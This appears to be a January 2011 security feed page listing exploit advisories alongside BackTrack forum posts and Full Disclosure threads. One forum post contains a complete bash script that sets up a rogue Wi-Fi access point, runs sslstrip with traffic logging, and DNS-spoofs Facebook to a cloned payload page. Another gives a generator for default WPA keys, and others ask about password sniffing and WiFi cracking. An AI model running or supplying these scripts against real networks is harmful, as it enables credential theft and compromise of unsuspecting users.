  Tags:   

• 15:22

  Amoeba CMS 1.01 Shell Upload / SQL Injection

   » ‎ Packet Storm Security Exploits
  Amoeba CMS version 1.01 suffers from shell upload and remote SQL injection vulnerabilities.

  Tags:  amoeba shell cms  

• 15:22

  Amoeba CMS 1.01 Shell Upload / SQL Injection

   » ‎ Packet Storm Security Recent Files
  Amoeba CMS version 1.01 suffers from shell upload and remote SQL injection vulnerabilities.

  Tags:  amoeba shell cms  

• 15:22

  Amoeba CMS 1.01 Shell Upload / SQL Injection

   » ‎ Packet Storm Security Misc. Files
  Amoeba CMS version 1.01 suffers from shell upload and remote SQL injection vulnerabilities.

  Tags:  amoeba shell cms  

• 15:06

  VM Workstation & BT Full Screen

   » ‎ BackTrack Linux Forums
  Hi,
  
  I had BT 4 R2 working in full screen then had a display problem that stopped the GUI from working - followed the forum posts and resolved it. Now BT won't go full screen. I'm new to this, and have tried fix-vesa and have VM set to Autofit Window & Guest, but still no full screen. Any help would be appreciated.
  
  Regards

  Tags:   

• 14:22

  Skadate Cross Site Scripting

   » ‎ Packet Storm Security Exploits
  Skadate suffers from multiple persistent cross site scripting vulnerabilities.

  Tags:  cross skadate site  

• 14:22

  Skadate Cross Site Scripting

   » ‎ Packet Storm Security Recent Files
  Skadate suffers from multiple persistent cross site scripting vulnerabilities.

  Tags:  cross skadate site  

• 14:22

  Skadate Cross Site Scripting

   » ‎ Packet Storm Security Misc. Files
  Skadate suffers from multiple persistent cross site scripting vulnerabilities.

  Tags:  cross skadate site  

• 14:00

  [local exploits] - CoolPlayer 2.18 DEP Bypass

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - CoolPlayer 2.18 DEP Bypass

  Tags:  dep exploit exploits  

• 14:00

  [webapps / 0day] - YourTube v1.0 CSRF Vulnerability (Add User)

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [webapps / 0day] - YourTube v1.0 CSRF Vulnerability (Add User)

  Tags:  day csrf yourtube vulnerability  

• 14:00

  [webapps / 0day] - GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [webapps / 0day] - GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection

  Tags:  gallery day php script-gallery gallery-script photo-gallery  

• 14:00

  [webapps / 0day] - Amoeba CMS v1.01 multiple remote vulnerabilities

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [webapps / 0day] - Amoeba CMS v1.01 multiple remote vulnerabilities

  Tags:  day amoeba cms webapps vulnerabilities  

• 13:56

  Laptop mouse pad and keyboard stop working on UI load.

   » ‎ BackTrack Linux Forums
  Hello forum,
  
  I am hoping someone can help me with my problem:
  
  I have installed BackTrack 4 R2 to a partition on my laptop. My problem is that once the UI loads my mouse pad and keyboard stop working. If I boot off the CD everything works fine although this is not desirable because reading off a CD can be slow at times.
  
  Earlier today I installed BackTrack to VMware and that worked fine also. The reason why I stopped using VMware is because I later found out the guest OS cannot use my wireless adapter.
  
  My laptop is a NEC Versa L2200.
  
  If you have any suggestions or questions please let me know!
  
  Regards

  Tags:   

• 13:46

  SoftAP with DNS spoofing. Ettercap kills connectivity?

   » ‎ BackTrack Linux Forums
  So I gave up trying to get other peoples SoftAP scripts working, and I decided to write my own. I've got the base functionality working near perfectly now, and even added SSLstrip capabilities, but upon expanding further, I've run across a problem that's been giving me migraines. Perhaps someone could help?
  
  So far everything's working except for Ettercap DNS spoofing. For the proof of concept I'm trying to spoof Facebook to a cloned page with an embedded Metasploit javascript payload.
  
  After the Ettercap portion of my script runs, I can run nslookup on my laptop and confirm that Facebook has indeed been spoofed to my BT4 box running the script.
  
  The problem is that even though Facebook gets spoofed, every other webpage fails to load at that point. Ettercap spoofs one page and kills the rest? That can't be right... Any help would be very appreciated.
  
  Here's the script for those who're interested:
  Code: #Cleanup and obfuscation
killall -9 dhcpd airbase-ng airmon-ng sslstrip tail
airmon-ng stop wlan0
airmon-ng stop mon0
airmon-ng start wlan0
ifconfig eth0 down
ifconfig wlan0 down
ifconfig mon0 down
macchanger -r eth0
macchanger -m 00:22:C3:4A:D9:C4 wlan0
macchanger -m 00:22:C3:4A:D9:C4 mon0
ifconfig eth0 up
ifconfig wlan0 up
ifconfig mon0 up
#Connects to AP 192.168.1.1 netmask 255.255.255.0 through eth0 with DNS server 192.168.1.1
ifconfig eth0 192.168.1.109
route add default gw 192.168.1.1 eth0
echo nameserver 192.168.1.1 > /etc/resolv.conf
#Auto creates and configures dhcpd.conf for later settings.
echo "ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 192.168.2.129;
range 192.168.2.130 192.168.2.140;
}" > dhcpd.conf
#Enable tunneling for later routing
modprobe tun &
#Start the access point with BSSID 00:1A:B2:3D:C4:5D and ESSID SoftAP on channel 1 via mon0
xterm -e airbase-ng -e "SoftAP" -c 6 -v mon0 &
sleep 8
#To respond to !ALL! essid probes use: "xterm -e airbase-ng -P -C 15 -e "(ESSID)" -c 1 -v mon0 &" !!ILLEGAL!!
#Brings up the tap interface created by airbase-ng and assigns it an IP, netmask, and route
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
#Gives dhcpd the permissions it needs
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
#Runs DHCP server for SoftAP
xterm -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &
sleep 5
#Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables rules
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT #delete if necessary / redundant later
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT #?
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
#Thanks to Anonymous of (REDACTED)chan.org/b for these last two rules!
iptables -A OUTPUT -j ACCEPT -m state --state NEW,ESTABLISHED,RELATED -o at0 -p tcp -m multiport --dports 80,443 --sport 1024:65535
iptables -A INPUT -j ACCEPT -m state --state ESTABLISHED,RELATED -i at0 -p tcp
#End of contribution
#Enables http and https traffic to be redirected to sslstrip on port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
#Launches sslstrip, listening on port 8080 for redirected packets
xterm -e /usr/bin/./sslstrip -l 8080 -w /root/sslstrip.log &
sleep 5
#Launches a new terminal that will interactively display the contents of sslstrip.log as it grows
xterm -e tail -f /root/sslstrip.log &
#Buggy ettercap page redirect
echo
echo "Run SET, and make a cloned webpage of facebook with a javascript payload"
echo
echo "facebook.com A 192.168.2.129" >> /usr/share/ettercap/etter.dns
echo "*.facebook.com A 192.168.2.129" >> /usr/share/ettercap/etter.dns
echo "www.facebook.com PTR 192.168.2.129" >> /usr/share/ettercap/etter.dns
read -p "Press any key after a client connects to continue."
echo "Running ettercap to redirect facebook to 192.168.2.129"
xterm -e ettercap -i at0 -T -q -P dns_spoof /192.168.2.129/ /192.168.2.130/ &

  Tags:   

• 13:42

  Re: Mentioning of my consultancy on mailing lists

   » ‎ Full Disclosure

  Posted by Cal Leeming [Simplicity Media Ltd] on Jan 02

  Isn't there some huge thing about trolling from n3td3v? :S
  

  Tags:   

• 13:00

  Hackaday links: January 2, 2011

   » ‎ Hack a Day
  DIY driving controller It looks like this steering wheel, shifter, and foot pedal were all made from string and garbage. That being said, you can see it works quite well. The setup just pushed keys on the keyboard,  which reminds us of the junky plastic add-ons for the Wii remote. [Thanks Toumal] Taping PCI express [...]

  Tags:  hackaday diy january wii-remote wii steering-wheel hackaday links  

• 12:50

  Re: Mentioning of my consultancy on mailing lists

   » ‎ Full Disclosure

  Posted by phocean on Jan 02

  No problem, it will be easy as I don't care about you and I am willing
  to talk anymore about your business.
  
  However, note that I was just refering to the fair amount of trolling
  which has been made with your pseudo. So don't mistake : you are the
  only responsible of what you have said and done.
  
  Good luck if you find any matter for legal action on it. If ever some
  judge accepted to open a case, even the worst lawyer of the world would
  win it....
  

  Tags:   

• 12:00

  Would you entrust your DSLR to this diy underwater enclosure?

   » ‎ Hack a Day
  Next time you head off on that underwater adventure take your camera along with you. [Jkcobabe] shows us how to build a waterproof camera enclosure using just a few components. The box is meant to be used to keep your stuff dry while camping, and the lens housing is made using plumbing fittings from the [...]

  Tags:  camera enclosure dslr plumbing-fittings camera-enclosure waterproof-camera digital cameras hacks  

• 11:37

  What career to pursue for the moment?

   » ‎ BackTrack Linux Forums
  So which job will land me a better pentesting job? And programmer or a network engineer/administrator?
  
  I'm trying to pursue a programming job, but my experience and background would land me a networking job easier. I have experience with servers and a few certifications (network+, security+) as well. My Father is a network engineer and admin with his own business and has taught just about everything I know about computers. But I can code a mean programming, and is working on learning assembly language for finding them sexy exploits. Currently trying to understand all the registers and x86 language overall. Currently I'm memorizing the duties of the ESI (source index), EDI (destination index), EAX(accumulator), EDX (data), EBX (general), ESP (stack pointer), EBP (base pointer). I also know about searching for the all important EIP(instruction pointer). I also understand a few assembly operations like jmp, cmp, mov, and even the basics like memory segmentation. I understand overflows, but haven't quite figured out how to discover them. Gimme a few more months and I'll have a solid grasp. But because I've been lazy my grades in coding classes have fallen a little short (B's and C's). I know I could land a job as a Unix Admin, but is a hacker with a background in programmer better than a hacker with a networking admin job?

  Tags:   

• 11:00

  Classic game emulation on the Dockstar

   » ‎ Hack a Day
  [Hunter Davis] is playing games like Contra, Monkey Island, and Quake 3 by running them on a Seagate Dockstar. We were shocked after seeing how well these run in the video after the break. [Hunter], who used the ZipIt for game emulation in the past, added a couple of hardware peripherals to get everything running. [...]

  Tags:  game-emulation hardware-peripherals monkey-island linux hacks  

• 10:13

  Reverse geocaching Christmas gift box

   » ‎ Hack a Day
  This is the reverse geocache box that [William Dillon] built as a Christmas gift this year. He started with an interestingly shaped wooden box from the craft store. The clasp to keep it shut uses a servo motor on the lid with a wooden arm that grasps a screw on the base. As with the [...]

  Tags:  christmas box gift william-dillon servo-motor christmas-gift gps hacks  

• 9:11

  CoolPlayer 2.18 DEP Bypass

   » ‎ Packet Storm Security Exploits
  CoolPlayer version 2.18 buffer overflow exploit that spawns calc.exe and has DEP bypass.

  Tags:  dep coolplayer bypass buffer-overflow-exploit  

• 9:11

  CoolPlayer 2.18 DEP Bypass

   » ‎ Packet Storm Security Recent Files
  CoolPlayer version 2.18 buffer overflow exploit that spawns calc.exe and has DEP bypass.

  Tags:  dep coolplayer bypass buffer-overflow-exploit  

• 9:11

  CoolPlayer 2.18 DEP Bypass

   » ‎ Packet Storm Security Misc. Files
  CoolPlayer version 2.18 buffer overflow exploit that spawns calc.exe and has DEP bypass.

  Tags:  dep coolplayer bypass buffer-overflow-exploit  

• 8:36

  [local] - CoolPlayer 2.18 DEP Bypass - [CVE: 2008-3408]

   » ‎ Exploit-DB
  [local] - CoolPlayer 2.18 DEP Bypass - [CVE: 2008-3408]

  Tags:   

• 7:41

  512 LED cube

   » ‎ Hack a Day
  Get out the soldering iron and clear your schedule, it’s going to take you a while to assemble this 8x8x8 LED matrix which contains a total of 512 LEDs. We’ve looked in on a 3x3x3 cube, and [Chr], who is responsible for this one, has assembled a 4x4x4 cube before, but this one is quite [...]

  Tags:  iron led cube 4x4x4-cube 3x3x3-cube led-matrix hacks  

• 7:24

  Viewing passwords for websites on ettercap-gtk

   » ‎ BackTrack Linux Forums
  Once i start unified sniffing on a host ip address, i see alot of connections but how can i see passwords for particualar websites visited, for e.g it would show Facebook.com being visited but no username or password.
  
  Am i missing something?
  
  Thnx

  Tags:   

• 6:42

  Tiscali Default WPA Passphrases

   » ‎ BackTrack Linux Forums
  Hello everyone.
  
  I have attempted to write a script to generate Tiscali Default WPA Key dictionary.
  Its not very pretty and could do with more input validation but it works. It creates a dictionary about 13mb in size. Hope you find it useful.
  
  Code: #/bin/bash/

#set your path of crunch
CRUNCH="/pentest/passwords/crunch/./crunch"

echo "Tiscali Gigaset SE587 WPA Passphrase Dictionary Generator
Enter the last 6 of your SSID "
read MAC
echo "What would you like the wordlist to be called?"
read FILENAME
echo "Generating wordlist...."
echo $MAC | tr "[:lower:]" "[:upper:]" > mac
sed 'h; s/.* //; s/.\{1\}/& /g; x; s/[^ ]*$//; G; s/\n//' mac > spacedmac
IFS=" "
set $(cat spacedmac)
${CRUNCH} 12 12 0123456789ABCDEF -t ${6}@@${4}0${3}${6}@${4}@${5}@ > $FILENAME
rm mac
rm spacedmac
echo "Done! your wordlist is called $FILENAME"

  Tags:   

• 6:22

  Bywifi 2.8.1 Stack Buffer Overflow

   » ‎ Packet Storm Security Exploits
  Bywifi version 2.8.1 stack buffer overflow exploit.

  Tags:  bywifi buffer overflow stack-buffer buffer-overflow  

• 6:22

  MS10-073 Windows Class Handling

   » ‎ Packet Storm Security Exploits
  Demonstration code that exploits the Windows class handling vulnerability as detailed in MS10-073.

  Tags:  class handling windows demonstration-code vulnerability  

• 6:22

  Tech Shop Technote 7 SQL Injection

   » ‎ Packet Storm Security Exploits
  Tech Shop Technote version 7 suffers from a remote SQL injection vulnerability.

  Tags:  technote shop tech vulnerability sql tech-shop  

• 6:22

  Tech Shop Technote 7 SQL Injection

   » ‎ Packet Storm Security Recent Files
  Tech Shop Technote version 7 suffers from a remote SQL injection vulnerability.

  Tags:  technote shop tech vulnerability sql tech-shop  

• 6:22

  MS10-073 Windows Class Handling

   » ‎ Packet Storm Security Recent Files
  Demonstration code that exploits the Windows class handling vulnerability as detailed in MS10-073.

  Tags:  class handling windows demonstration-code vulnerability  

• 6:22

  Bywifi 2.8.1 Stack Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  Bywifi version 2.8.1 stack buffer overflow exploit.

  Tags:  bywifi buffer overflow stack-buffer buffer-overflow  

• 6:22

  Tech Shop Technote 7 SQL Injection

   » ‎ Packet Storm Security Misc. Files
  Tech Shop Technote version 7 suffers from a remote SQL injection vulnerability.

  Tags:  technote shop tech vulnerability sql tech-shop  

• 6:22

  MS10-073 Windows Class Handling

   » ‎ Packet Storm Security Misc. Files
  Demonstration code that exploits the Windows class handling vulnerability as detailed in MS10-073.

  Tags:  class handling windows demonstration-code vulnerability  

• 6:22

  Bywifi 2.8.1 Stack Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  Bywifi version 2.8.1 stack buffer overflow exploit.

  Tags:  bywifi buffer overflow stack-buffer buffer-overflow  

• 5:54

  WEP Cracking Problem

   » ‎ BackTrack Linux Forums
  I always crack Wep AP in my area but there are some AP's Hult My Wireless I mean
  when I start receive packets it hult! Can anyone Help me.
  
  Best regards

  Tags:   

• 5:33

  I'm trying to figure out how to run and use BackTrack 4 R2 on a mac book pro,

   » ‎ BackTrack Linux Forums
  I'm trying to figure out how to run and use BackTrack 4 R2 on a mac book pro,
  to Crack WiFi - WPA/WPA2.

  Tags:   

• 5:01

  Re: ms04-006 exploit challenges

   » ‎ Full Disclosure

  Posted by yuange on Jan 02

  
  http://hi.baidu.com/yuange1975/blog/item/e02d4a5cb4e83551fbf2c08f.html#comment
  
  int GetOverStr(char *buf,char *server,char *urlfile,int ptr)
  {
  unsigned char wins_unknown_1[] =
  {
  0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x40, 0xff,
  0x05, 0x5a, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00
  // , 0x00, 0x00, 0x00, 0x00
  };
  unsigned int buflen;
  unsigned int p_shellcode;
  unsigned char *p;
  unsigned int i,j;
  //...
  

  Tags:   

• 3:57

  Re: Career Criminal Andrew Auernheimer has Violent Ideations of Law Enforcement

   » ‎ Full Disclosure

  Posted by phocean on Jan 02

  Here we go again ! This list looks so crazy...
  How many psychiatric cases in the security industry ? What the hell do
  you smoke ?
  Are you burning out trying to understand assembly ?
  
  Or, my 2 cents : one schizophrenic guy is behind all this : n3td3v,
  Musntlive, Dave Nett, Andrew, Weev, ...
  
  Le dimanche 02 janvier 2011 à 12:29 +0100, andrew wiggin a écrit :
  

  Tags:   

• 3:56

  Re: Career Criminal Andrew Auernheimer has Violent Ideations of Law Enforcement

   » ‎ Full Disclosure

  Posted by andrew wiggin on Jan 02

  Giordano Bruno was burned at the stake for teaching ideas such as
  transmigration of the soul and plurality of worlds. The copernican
  system was not considered a heresy in 1600.
  
  Zeno of Elea discredited the calculus with sophist sillogisms such as
  the dichotomy paradox. That's why calculus only spread several
  centuries later.
  
  Jesus Christ was crucified for disturbing the jerusalem temple during
  passover and proclaiming itself as the king of the...
  

  Tags:   

• 3:52

  Re: Career Criminal Andrew Auernheimer has Violent Ideations of Law Enforcement

   » ‎ Full Disclosure

  Posted by andrew wiggin on Jan 02

  Giordano Bruno was burned at the stake for teaching ideas such as
  transmigration of the soul and plurality of worlds. The copernican
  system was not considered a heresy in 1600.
  
  Zeno of Elea discredited the calculus with sophist sillogisms such as
  the dichotomy paradox. That's why calculus only spread several
  centuries later.
  
  Jesus Christ was crucified for disturbing the jerusalem temple during
  passover and proclaiming itself as the king of the...
  

  Tags:   

• 3:43

  Re: Career Criminal Andrew Auernheimer has Violent Ideations of Law Enforcement

   » ‎ Full Disclosure

  Posted by andrew wiggin on Jan 02

  Giordano Bruno was burned at the stake for teaching ideas such as
  transmigration of the soul and plurality of worlds. The copernican
  system was not considered a heresy in 1600.
  
  Zeno of Elea discredited the calculus with sophist sillogisms such as
  the dichotomy paradox. That's why calculus only spread several
  centuries later.
  
  Jesus Christ was crucified for disturbing the jerusalem temple during
  passover and proclaiming itself as the king of the...
  

  Tags:   

• 3:36

  Re: Career Criminal Andrew Auernheimer has Violent Ideations of Law Enforcement

   » ‎ Full Disclosure

  Posted by andrew wiggin on Jan 02

  Giordano Bruno was burned at the stake for teaching ideas such as
  transmigration of the soul and plurality of worlds. The copernican
  system was not considered a heresy in 1600.
  
  Zeno of Elea discredited the calculus with sophist sillogisms such as
  the dichotomy paradox. That's why calculus only spread several
  centuries later.
  
  Jesus Christ was crucified for disturbing the jerusalem temple during
  passover and proclaiming itself as the king of the...
  

  Tags:   

• 3:29

  Re: Career Criminal Andrew Auernheimer has Violent Ideations of Law Enforcement

   » ‎ Full Disclosure

  Posted by andrew wiggin on Jan 02

  Giordano Bruno was burned at the stake for teaching ideas such as
  transmigration of the soul and plurality of worlds. The copernican
  system was not considered a heresy in 1600.
  
  Zeno of Elea discredited the calculus with sophist sillogisms such as
  the dichotomy paradox. That's why calculus only spread several
  centuries later.
  
  Jesus Christ was crucified for disturbing the jerusalem temple during
  passover and proclaiming itself as the king of the...
  

  Tags:   

• 3:16

  Mitm detection program

   » ‎ BackTrack Linux Forums
  Hey everyone. If this is in the wrong section please move it to the correct section. My question is " Is there a program that can detect if you are getting attacked by a mitm?". I have heard of a program for windows I believe it was called Id-caffeinated or something like that that would let you know if your routers mac had changed or something like that. I believe I heard about it ok a hak5 podcast but can't find it. Does anyone know what I'm talking about. I swore the program had the word caffinated in it but it has been axwhile and I could be wrong. All help appreciated.

  Tags:   

• 2:09

  [dos] - MS10-073 Windows Class Handling Vulnerability - [CVE: 2010-2744]

   » ‎ Exploit-DB
  [dos] - MS10-073 Windows Class Handling Vulnerability - [CVE: 2010-2744]

  Tags:   

• 0:15

  Linux samba exploit using Metasploit and Nessus

   » ‎ BackTrack Linux Forums
  Mod Edit: Youtube link removed.
  Linux samba exploit using metasploit
  Victim server :Metasploitable
  Attacker:backtrack4
  CVE:2007-2446
  Payload: cmd/unix/reverse
  http://blog.metasploit.com/2010/05/i...ploitable.html
  
  Music by: Noizepulse
  Track: Static movement
  Mod Edit: MySpace link removed.
  
  Overview
  
  Multiple heap-based buffer overflows in the NDR parsing in smbd in Samba 3.0.0 through 3.0.25rc3 allow remote attackers to execute arbitrary code via crafted MS-RPC requests involving (1) DFSEnum (netdfs_io_dfs_EnumInfo_d), (2) RFNPCNEX (smb_io_notify_option_type_data), (3) LsarAddPrivilegesToAccount (lsa_io_privilege_set), (4) NetSetFileSecurity (sec_io_acl), or (5) LsarLookupSids

  Tags:   

• 0:12

  [webapps] - Amoeba CMS v1.01 multiple remote vulnerabilities

   » ‎ Exploit-DB
  [webapps] - Amoeba CMS v1.01 multiple remote vulnerabilities

  Tags:   

• January 01, 2011
• 22:31

  TP Link - how to?

   » ‎ BackTrack Linux Forums
  Hi All.
  At work I use TP Link Router WR641g. I searched and did not refrain to find an exploit for my router. Is it possible to "penetrate" into my router? I want this to learn about security. To increase the security of my network.
  
  Thanks

  Tags:   

• 19:52

  [webapps] - YourTube v1.0 CSRF Vulnerability (Add User)

   » ‎ Exploit-DB
  [webapps] - YourTube v1.0 CSRF Vulnerability (Add User)

  Tags:   

• 19:42

  Backtrack Guest (VBox) dial up connection

   » ‎ BackTrack Linux Forums
  Yes, I know dial up is the ass end of connections, but i move around alot, so need to figure this out. Now i am a total noob when it comes to networking, and pretty much backtrack as well, i just started to learn this stuff basically. Im trying to create either a connection thatll share the internet from my Win 7 dial up or create something within backtrack thatll let me use my dial up modem. So far nothing has worked, i have tried google and such for help, nothing great so far. My win 7 does have a firewall, the windows and another, took em down, nothing changed, net dont work through BT. Ive tried messing with NAT and the Bridge, that didnt work, though i didnt think it would, Bridge said my ether card, which is not what im using for net obviously. I dont know what DNS is (domain name server?) i know what an ip address is kind of, dont kknow how to see mine though. I need this to help get apps, i got to do it through a share folder and then compile whatever tarball file through konsole... gets tedious. Btw it took me 3 days to learn how to get a share folder between guest and host cause i didnt know what directories were or the cd command, thats how much of a noob i am.

  Tags:   

• 19:17

  [webapps] - GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection

   » ‎ Exploit-DB
  [webapps] - GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection

  Tags:   

• 19:00

  Reasons why NMAP might be slow

   » ‎ BackTrack Linux Forums
  Hello
  
  I was wondering if any one might know why the performance of NMAP on my BT4 VM image is really slow.
  
  For example a simple nmap XX.XX.XX.XX of my router took 14.6 seconds on Windows it tool 0.6 seconds and on Ubuntu it took 0.4?
  
  There is quite a considerable difference between them?
  
  Thank you

  Tags:   

• 17:13

  Re: Career Criminal Andrew Auernheimer has Violent Ideations of Law Enforcement

   » ‎ Full Disclosure

  Posted by Victor Rigo on Jan 01

  Hi Weev,
  
  I too have faced police harassment. Indeed, they went door to door to everyone I knew. All behind my back, never giving
  me a card. My delicate, modest life was torn into shreds. I eventually broke into a psychosis induced by the confusion
  and mind games and dirty tricks police played on me.
  
  I feel alone, beaten and smothered without words or recourse. I am numb and frigid. Friendless and alone, trust of no
  one.
  
  Even in my new town,...
  

  Tags:   

• 17:01

  Outlook 6.0.2900.5508 DLL Hijack

   » ‎ Packet Storm Security Exploits
  Outlook version 6.0.2900.5508 DLL hijacking exploit.

  Tags:  hijack dll outlook outlook-6 hijacking version-6